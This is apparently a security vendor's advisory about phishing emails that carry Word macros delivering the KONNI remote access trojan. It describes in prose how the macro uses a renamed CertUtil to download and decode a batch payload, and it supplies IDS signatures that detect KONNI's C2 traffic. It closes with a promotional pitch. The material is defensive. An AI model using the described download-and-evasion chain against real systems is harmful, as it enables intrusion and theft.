Phishing emails used to load KONNI Malware

Noel

Summary:

The Cybersecurity and Infrastructure Security Agency (CISA) and our SOC have observed cyber actors using emails containing a Microsoft Word document with a malicious Visual Basic Application (VBA) macro code to deploy KONNI malware. KONNI is a remote administration tool (RAT) used by malicious cyber actors to steal files, capture keystrokes, take screenshots, and execute arbitrary code on infected hosts.

Tech Details:

KONNI malware can be delivered via phishing emails as a Microsoft Word document with a malicious VBA macro code. The malicious code can change the font color from light grey to black (to fool the user to enable content), check if the Windows operating system is a 32-bit or 64-bit version, and construct and execute the command line to download additional files.

Once the VBA macro constructs the command line, it uses the certificate database tool CertUtil to download remote files from a given Uniform Resource Locator. It also incorporates a built-in function to decode base64-encoded files. The Command Prompt silently copies certutil.exe into a temp directory and renames it to evade detection.

The cyber actor then downloads a text file from a remote resource containing a base64-encoded string that is decoded by CertUtil and saved as a batch (.BAT) file. Finally, the cyber actor deletes the text file from the temp directory and executes the .BAT file.

While traditional signature and heuristic based endpoint protection and antivirus require signature updates to detect and respond to this type of zero-day attack vector, our 24×7 threat hunting team catch C2 remote access trojans by state-of-the-art inspection of your system logs through multiple Security Information Event Management systems (SIEMs).

If you have any questions about how to protect your business or organization from advanced phishing attacks, or how to detect these types of compromises in your environment, schedule an appointment with a security and systems analyst today! It only takes 15 seconds!

More information on KONNI : https://attack.mitre.org/software/S0356/

Signatures :

alert tcp any any -> any $HTTP_PORTS (msg:"HTTP URI contains
'/weget/*.php' (KONNI)"; sid:1; rev:1; flow:established,to_server;
content:"/weget/"; http_uri; depth:7; offset:0; fast_pattern;
content:".php"; http_uri; distance:0; within:12; content:!"Referrer|3a
20|"; http_header; classtype:http-uri; priority:2; metadata:service
http;)

alert tcp any any -> any $HTTP_PORTS (msg:"KONNI:HTTP header
contains 'User-Agent|3a 20|HTTP|0d 0a|'"; sid:1; rev:1;
flow:established,to_server; content:"User-Agent|3a 20|HTTP|0d 0a|";
http_header; fast_pattern:only; content:"POST"; nocase; http_method;
classtype:http-header; priority:2; metadata:service http;)

alert tcp any any -> any $HTTP_PORTS
(msg:"KONNI:HTTP URI contains '/weget/(upload|uploadtm|download)'";
sid:1; rev:1; flow:established,to_server; content:"/weget/"; http_uri;
fast_pattern:only;
pcre:"/^\/weget\x2f(?:upload|uploadtm|download)\.php/iU";
content:"POST"; http_method; classtype:http-uri; priority:2;
reference:url,blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html;
metadata:service http;)